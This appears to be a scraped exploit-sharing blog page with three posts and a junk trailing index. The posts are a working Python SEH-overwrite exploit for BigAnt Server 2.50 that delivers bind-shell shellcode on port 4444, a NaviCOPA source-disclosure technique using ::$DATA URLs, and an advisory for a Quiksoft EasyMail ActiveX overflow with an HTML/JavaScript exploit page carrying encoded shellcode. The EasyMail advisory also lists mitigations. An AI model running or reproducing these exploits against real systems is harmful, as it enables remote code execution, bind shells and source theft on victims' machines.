"\x4e\x4b\x4e\x4b\x4e\x4b\x45\x38\x42\x52\x4b\x4e\x4e\x53\x42"
"\x36\x4b\x4f\x42\x55\x47\x34\x4b\x4f\x49\x46\x51\x4b\x50\x57"
"\x51\x42\x50\x51\x46\x31\x50\x51\x43\x5a\x43\x31\x50\x51\x50"
"\x51\x51\x45\x50\x51\x4b\x4f\x48\x50\x42\x48\x4e\x4d\x48\x59"
"\x45\x55\x48\x4e\x50\x53\x4b\x4f\x49\x46\x42\x4a\x4b\x4f\x4b"
"\x4f\x47\x47\x4b\x4f\x4e\x30\x4c\x4b\x51\x47\x4b\x4c\x4b\x33"
"\x48\x44\x45\x34\x4b\x4f\x49\x46\x50\x52\x4b\x4f\x4e\x30\x45"
"\x38\x4a\x50\x4d\x5a\x43\x34\x51\x4f\x51\x43\x4b\x4f\x4e\x36"
"\x4b\x4f\x4e\x30\x41\x41")


payload = "\x41" * 985 # seh overwritten at 989
next_seh = "\xeb\x06\x90\x90" # short jump 6 bytes
seh = "\x6a\x19\x9a\x0f" # p/p/r from vbajet32.dll
nops = "\x90" * 10 # nop sled
sc = shellcode # 710 bytes available for shellcode

print "\n[*] BigAnt Server v2.50 SEH Overwrite 0day"
print "[*] Written and discovered by Blake"
print "[*] Tested on Windows XP SP3\n"

print "[+] Connecting to %s on port %d" % (host,port)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((host,port))
except:
print "[x] Error establishing connection\n"
sys.exit(0)

print "[+] Sending payload"
s.send("GET " + payload + next_seh + seh + nops + sc + "\r\n\r\n")
s.close()
print "[+] Connect to bind shell on port 4444\n"

• 0 comments »

NaviCOPA Web Server 3.01 Remote Source Code Disclosure

Web Server 3.01 is a Windows based HTTP server. This is the latest version of
the application available.

NaviCOPA is vulnerable to remote arbitrary source code disclosure by the following means.


NaviCOPA- Technical Details

 http://[ webserver IP]/[ file ][::$DATA]
 
 http://172.16.2.101/index.html::$DATA

 http://172.16.2.101/default.asp::$DATA

 http://172.16.2.101/index.php::$DATA

• 0 comments »

Description: Remotely exploitable buffer overflow in ActiveX component
Quiksoft EasyMail 6.0.3.0 allows for the arbitrary code execution in the
user context.

Author: Sebastian Wolfgarten (sebastian at wolfgarten dot com),


Date: September 17th, 2009

Severity: Medium (remote code execution in the user context)

References: http://www.devtarget.org

III - OVERVIEW

Quote from quiksoft.com: "The EasyMail Products are relied upon by over thousands
of international corporations, federal, state and local organizations, and individual
developers. Quiksoft has established the EasyMail products as "the professional,
reliable, and easy to use choice for e-mail development". More information about
the product can be found online at http://www.quiksoft.com.

IV - DETAILS

The software Quiksoft EasyMail 6.0.3.0 ships emimap4.dll, an ActiveX component
to facilitate the development of IMAP4-aware applications. The connect() function
of this component is prone to a classic buffer overflow vulnerability when a
particularly long argument is passed and the application attempts to copy that
data into a finite buffer. This allows for the execution of arbitrary code in the
user context.

V - MITIGATING MEASURES

Either set the killbit for the relevant ActiveX component (clsid:0CEA3FB1-7F88-4803-AA8E-AD021566955D)
or install the latest version of Quiksoft EasyMail which is not considered vulnerable.

VI - NOTES

Code below was taken from an exploit originally written by e.b
(see http://www.milw0rm.com/exploits/4825). Thanks also to Francis Provencher
for drawing my attention on Quiksoft EasyMail. Shellcode below is rather harmless and
executes calc.exe.

Tested on Windows XP SP2 English, IE6, emimap4.dll version 6.0.3.0

-->

<html>
<head>
<title>Quiksoft EasyMail 6.0.3.0 imap connect() stack overflow</title>
<script language="JavaScript" defer>
function Check() {
var buf = 'A';
while (buf.length <= 440) buf = buf + 'A';


// win32_exec - EXITFUNC=seh CMD=c:\windows\system32\calc.exe Size=378 Encoder=Alpha2 http://metasploit.com
var shellcode1 = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49" +
"%48%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%43" +
"%58%30%42%31%50%42%41%6b%42%41%53%42%32%42%41%32" +
"%41%41%30%41%41%58%50%38%42%42%75%48%69%6b%4c%4d" +
"%38%63%74%75%50%33%30%67%70%4c%4b%73%75%57%4c%6e" +
"%6b%63%4c%45%55%63%48%33%31%58%6f%6c%4b%70%4f%77" +
"%68%6e%6b%73%6f%71%30%65%51%6a%4b%72%69%4e%6b%36" +
"%54%4e%6b%45%51%4a%4e%46%51%6b%70%4f%69%4c%6c%6e" +
"%64%59%50%73%44%53%37%58%41%7a%6a%54%4d%33%31%78" +
"%42%48%6b%7a%54%77%4b%52%74%66%44%34%44%62%55%59" +
"%75%6e%6b%41%4f%36%44%45%51%6a%4b%53%56%4c%4b%46" +
"%6c%72%6b%4c%4b%53%6f%37%6c%63%31%6a%4b%4e%6b%75" +
"%4c%6c%4b%54%41%48%6b%4d%59%51%4c%51%34%34%44%4a" +
"%63%30%31%6f%30%62%44%4e%6b%71%50%54%70%4b%35%6b" +
"%70%50%78%46%6c%6c%4b%63%70%44%4c%4c%4b%44%30%35" +
"%4c%6e%4d%6c%4b%61%78%55%58%6a%4b%64%49%4e%6b%6b" +
"%30%6c%70%57%70%57%70%47%70%4c%4b%70%68%47%4c%71" +
"%4f%44%71%6b%46%33%50%66%36%4f%79%4c%38%6e%63%4f" +
"%30%71%6b%30%50%41%78%58%70%6c%4a%53%34%51%4f%33" +
"%58%4e%78%39%6e%6d%5a%46%6e%61%47%4b%4f%69%77%63" +
"%53%45%6a%33%6c%72%57%30%69%50%6e%62%44%70%6f%73" +
"%47%41%63%41%4c%50%73%42%59%31%63%50%74%65%35%70" +
"%6d%54%73%65%62%33%6c%30%63%41%71%70%6c%53%53%66" +
"%4e%31%75%74%38%70%65%77%70%43");

var eip = unescape("%0F%DD%17%7D"); // Windows XP SP2 English
var nop = unescape("%90%90%90%90%90%90%90%90%90%90%90%90");

var m = buf + eip + nop + shellcode1 + nop;
obj.connect(m);
}
</script>
</head>
<body onload="JavaScript: return Check();">
<object id="obj" classid="clsid:0CEA3FB1-7F88-4803-AA8E-AD021566955D">
Failed to instantiate object.
</object>
</body>
</html>

• 0 comments »

INDEX TIPS and TRICK , DHTML, CSS, JAVASCRIPT

• a
• a
• a
• a
• a
• a
• a
• a
• aa
• a
• a

• 0 comments »